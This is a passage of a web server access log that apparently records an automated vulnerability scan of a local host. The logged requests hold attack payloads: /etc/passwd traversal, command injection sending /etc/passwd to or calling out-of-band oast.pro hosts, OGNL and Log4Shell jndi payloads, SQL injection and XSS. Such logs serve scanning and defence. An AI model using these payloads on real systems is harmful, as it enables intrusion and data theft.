HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A ca28bc0smpvbbtig07h0k4a48s1q1z6zd.oast.pro\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A 0\x0D\x0A false\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bbpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/cgi-bin/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws/invoke HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJ7e3VzZXJuYW1lfX0ifX0=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ck/domenu.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=node&destination=node HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//ca28bc0smpvbbtig07h0o1j3475bewc3d.oast.proPa_Note%27","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/file_transfer.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_up.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nagios4/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"username=${jndi:ldap://${hostName}.ca28bc0smpvbbtig07h0m51gp49u5u7q7.oast.pro/test}&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_2/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:registerGuest\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22name\x5C\x22:\x5C\x22cve-2020-nuclei\x5C\x22,\x5C\x22email\x5C\x22:\x5C\x22cve@nuclei.local\x5C\x22}],\x5C\x22id\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA